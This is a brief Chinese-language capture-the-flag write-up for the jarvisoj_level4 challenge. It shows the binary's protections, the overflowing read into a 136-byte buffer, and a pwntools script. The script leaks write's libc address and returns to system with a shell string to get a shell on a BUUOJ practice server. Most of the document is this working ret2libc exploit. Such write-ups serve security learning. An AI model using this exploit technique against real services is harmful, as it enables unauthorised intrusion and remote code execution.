jarvisoj_level4
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位,只开了nx
ssize_t vulnerable_function()
{
char buf[136]; // [esp+0h] [ebp-88h] BYREF
return read(0, buf, 0x100u);
}
栈溢出
思路
跟3差不多,直接贴(传送门)
注意一下32位和64位的位置就可,
from pwn import*
from Yapack import *
libc=ELF('libc-2.23_32.so')
r,elf=rec("node4.buuoj.cn",29255,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
pl=cyclic(0x88+4)+flat(elf.plt['write'],0x8048470,1,elf.got['write'],4)
s(pl)
leak=u32(r.recv(4))-libc.sym['write']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0x88+4)+flat(sys,0,sh)
sl(pl)
#debug()
ia()